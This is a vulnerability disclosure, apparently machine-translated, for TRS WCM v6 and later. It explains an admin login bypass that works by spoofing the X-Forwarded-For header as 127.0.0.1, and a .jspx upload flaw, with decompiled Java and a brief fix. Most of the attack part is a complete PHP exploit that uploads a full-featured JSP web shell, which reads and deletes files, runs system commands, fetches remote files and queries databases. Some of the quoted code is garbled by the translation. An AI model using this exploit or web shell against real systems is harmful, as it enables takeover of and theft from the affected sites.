TRSWCM background Permission Bypass and GETSHELL (including detailed repair solutions)

TRSWCM background Permission Bypass and GETSHELL (including detailed repair solutions)
Trs wcm is later than v6 and v5.X does not exist. No Logon required. Note: This vulnerability affects a large number of sites. We are worried that the vulnerability details may be exposed in advance due to vendor neglect. Ask the Administrator to go to cncert's national Internet emergency center to handle the vulnerability. Thank you. The code in/WEB-INF/web. xml is as follows:

<servlet><servlet-name>govcontroller</servlet-name><servlet-class>com.trs.webframework.controler.servlet.NoLoginServiceControler</servlet-class><init-param><param-name>AllowIP</param-name><param-value>127.0.0.1</param-value></init-param><init-param><param-name>CurrUser</param-name><param-value>admin</param-value></init-param><init-param><param-name>RedirectURI</param-name><param-value>/center.do</param-value></init-param></servlet>  <servlet-mapping><servlet-name>govcontroller</servlet-name><url-pattern>/govcenter.do</url-pattern></servlet-mapping>  <servlet><servlet-name>govfileuploader</servlet-name><servlet-class>com.trs.webframework.controler.servlet.NoLoginServiceControler</servlet-class><init-param><param-name>AllowIP</param-name><param-value>127.0.0.1</param-value></init-param><init-param><param-name>CurrUser</param-name><param-value>admin</param-value></init-param><init-param><param-name>RedirectURI</param-name><param-value>/fileuploader.do</param-value></init-param> </servlet>  <servlet-mapping><servlet-name>govfileuploader</servlet-name><url-pattern>/govfileuploader.do</url-pattern></servlet-mapping>

 

The program configures two Servlets, one is govcontroller and the other is govfileuploader, open their corresponding class file:/WEB-INF/lib/trswcmv6/com/trs/webframework/controler/Servlet/NoLoginServiceControler. the core JAVA code after class decompilation is as follows:

Protected void service (HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse) throws ServletException, IOException {String s = httpservletrequest. getHeader ("X-Forwarded-For"); if (CMyString. isEmpty (s) s = httpservletrequest. getRemoteAddr (); boolean flag = isAllowIP (s); if (! Flag ){............ // If the IP address does not match, the error is processed. The code is omitted .}............ // If the IP address matches correctly, the logon succeeds. The Code catch (ServletException servletexception) {throw servletexception;} finally {ContextHelper. clear (); httpservletrequest. getSession (). removeAttribute ("WCM52.loginUser") ;}} private boolean isAllowIP (String s) {if (m_pIPs = null) return false; String as [] = s. split ("\\. "); for (int I = 0; I <m_pIPs.length; I ++) {String as1 [] = m_pIPs [I]. split ("\\. "); if (as1.length! = As. length) continue; boolean flag = false; int j = 0; do {if (j> = as. length) break; if (! As1 [j]. equals ("*")&&! As [j]. equals (as1 [j]) {flag = true; break;} j ++;} while (true); if (! Flag) return true;} return false;} public void init () throws ServletException {String s = getInitParameter ("AllowIP"); if (s! = Null) m_pIPs = s. split (","); s = getInitParameter ("CurrUser"); if (s! = Null & (s = s. trim ()). length ()> 0) m_sUserName = s; m_sRedirectURI = CMyString. showNull (getInitParameter ("RedirectURI"), "/center. do "); if (! M_sRedirectURI.startsWith ("/") m_sRedirectURI = "/" + m_sRedirectURI; super. init ();}

 

From the code above, it is not difficult to see that the program uses httpservletrequest. getHeader () obtains the X-Forwarded-For header value in the HTTP request header, and then calls isAllowIP () to compare the init () method from the web. whether the values of the AllowIP obtained in xml (127.0.0.1) and X-Forwarded-For are the same. If they are different, the program exits with an error. If they are the same, the Session is successfully created. In a summary, if the value of X-Forwarded-For in the HTTP request header is 127.0.0.1, the program considers that the center. do and fileuploader. do can be called to log on as admin. Govcenter is used below. do first queries the user's userid to modify the login user's password and other information: we can see that the userid corresponding to the test1 user is 2 and the password is 621EE7AEAFA2281, And the username and password with the userid as 2 are all modified, for example: if you query the hitest user information again, the userid is still 2, but the account and password are updated. For example, the second vulnerability is govfileuploader. do upload vulnerability, the corresponding class file is:/WEB-INF/lib/trswcmv6/com/trs/webframework/controler/servlet/FileUploader. after the class is decompiled, its core JAVA code is: protected void service (HttpServletRequest httpservletrequest, HttpServletResponse httpservletrespo AUC) {byte abyte0 []; ...... Abyte0 = StreamBuddy. readFromInputStream (httpservletrequest. getInputStream ());...... Try {String s = null; String s1 = httpservletrequest. getHeader ("FileExt"); String s2 = httpservletrequest. getHeader ("FileFlag"); if (CMyString. isEmpty (s2) s2 = "U0"; FilesMan filesman = FilesMan. getFilesMan (); String s3 = null; String s4 = null; s3 = filesman. getNextFilePathName (s2, s1); CMyFileX. writeFile (s3, abyte0); s4 = CMyFile. extractFileName (s3, "/"); s4 = CMyFile. extractFileName (s4 ,"\\"); Java. io. printWriter printwriter1 = httpservletresponse. getWriter (); s = s4; if (s = null) printwriter1.write (""); else if (s instanceof String) printwriter1.write ("<result> <ShowName> <! [CDATA ["+ CMyString. encodeForCDATA (String) s) + "]> </ShowName> </result>"); else printwriter1.write (I18NMessage. get (com. trs. webframework. controler. servlet. fileUploader. class, "FileUploader. label1 "," <result> unsupported processing type [") + s. getClass () + "]! </Result> "); the program uses httpservletrequest. the getHeader () method gets the values of FileExt and FileFlag, and then calls filesman. getNextFilePathName (s2, s1) is used to generate a file name. Note that the value of s2 is U0, P0, W0, TM, LP, and SF. They correspond to the directories where files are stored on the server, where the paths TM, LP, W0, and LV correspond to exactly four virtual directories in the TRS Tomcat default configuration. The relationship is as follows: id path TM $ TRSHOME $ \ TRSWCMV65 \ WCMData \ template \ LP $ TRSHOME $ \ TRSWCMV65 \ WCMData \ pub \ W0 $ TRSHOME $ \ TRSWCMV65 \ WCMData \ webpic \ LV $ TRSHOME $ \ the configuration of TRSWCMV65 \ WCMData \ preview \ tomcat is as follows: open E: \ TRS1 \ TRSWCMV65 \ WCMData \ webpic \ WEB-INF \ web. the xml content is as follows: the filter set by the Program for Access Denied is only for the jsp suffix, but the jspx suffix is not limited. Therefore, during the upload, The FileExt that controls the file suffix to be saved is set. jspx. The complete upload package is as follows:

Add a getshell exp for testing only:

<?php$host=@$argv[1];$port=@$argv[2];$wcmpath=@$argv[3];if(eregi("https://",$host)){$host=explode("https://",$host);$host=$host[1];$pre="https://";$host=str_replace("/","",$host);//echo $host."\r\n";}if(eregi("http://",$host)){$host=explode("http://",$host);$host=$host[1];$pre="http://";$host=str_replace("/","",$host);//echo $host."\r\n";}if(!$host or !$port or !$wcmpath or !@$pre or !is_numeric($port))exit("=================================================TRS WCM>=6 GETSHELL=================================================Usage: php wcm.php host port wcmpathExample: php wcm.php http://www.qq.com 80 wcmExample: php wcm.php https://www.qq.com 8000 wcm=================================================");//preg_match();function http_send($host, $port, $packet){$sock = fsockopen($host, $port);while (!$sock){$sock = fsockopen($host, $port);}fputs($sock, $packet);while (!feof($sock)) @$resp .= fread($sock, 1024);fclose($sock);//print $resp;return $resp;}$data='<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2"><jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /><jsp:directive.page import="java.io.*"/><jsp:directive.page import="java.util.*"/><jsp:directive.page import="java.net.*"/><jsp:directive.page import="java.sql.*"/><jsp:directive.page import="java.text.*"/><jsp:declaration>String Pwd="023320a1232222a";String cs="UTF-8";String EC(String s)throws Exception{return new String(s.getBytes("ISO-8859-1"),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length>4){c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i&lt;r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0; i&lt;l.length; i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ +=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0; k &lt; x.length; k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"&lt;-").getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws Exception{String h="0123456789ABCDEF";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i&lt;d.length();i+=2){os.write((h.indexOf(d.charAt(i)) &lt;&lt; 4 | h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0; j&lt;z.length; j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s,String d)throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection) u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is,StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"\r\n");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] x=s.trim().split("\r\n");ResultSet r=c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null,"%",new String[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i&lt;=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i &lt;=n; i++){sb.append(d.getColumnName(i)+"\t|\t");}sb.append("\r\n");if(q.indexOf("--f:")!=-1){File file=new File(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i&lt;=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"\t");bw.flush();}else{sb.append(r.getObject(i)+""+"\t|\t");}}if(bw!=null){bw.newLine();}sb.append("\r\n");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}</jsp:declaration><jsp:scriptlet>cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;response.setContentType("text/html");response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer("");try{String Z=EC(request.getParameter(Pwd)+"");String z1=EC(request.getParameter("z1")+"");String z2=EC(request.getParameter("z2")+"");sb.append("->"+"|");String s=request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\","/")+"images/");}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"&lt;-");out.print(sb.toString());</jsp:scriptlet></jsp:root>';function postdata($host,$port,$wcmpath,$data){$packet  = "POST /{$wcmpath}/govfileuploader.do HTTP/1.0\r\n";$packet .= "Host: {$host}:{$port}\r\n";$packet .= "FileExt: jspx\r\n";$packet .= "FileFlag: W0\r\n";$packet .= "X-Forwarded-For: 127.0.0.1\r\n";$packet .= "Content-Length: ".strlen($data)."\r\n\r\n";$packet .= $data." ";return $packet;}$packet=postdata($host,$port,$wcmpath,$data);//echo $packet."\r\n";$html=http_send($host,$port,$packet);//echo $html."\r\n";if(!eregi("HTTP/1.1 404 Not Found",$html)){if(strpos($html,"jspx")){$patten="/A\[(.*?)\]\]/i";preg_match($patten,$html,$url);if(strpos($url[1],".jspx")){$shell=$pre.$host.":{$port}/webpic/".substr($url[1],0,8)."/".substr($url[1],0,10)."/".$url[1];echo "Getshell Successed!\r\n";echo $shell."\r\n";}elseecho "Failed!";}elseexit("Failed!");}?>

 

Solution:Delete the following code in NoLoginServiceControler. java:

String s = httpservletrequest.getHeader("X-Forwarded-For");if (CMyString.isEmpty(s))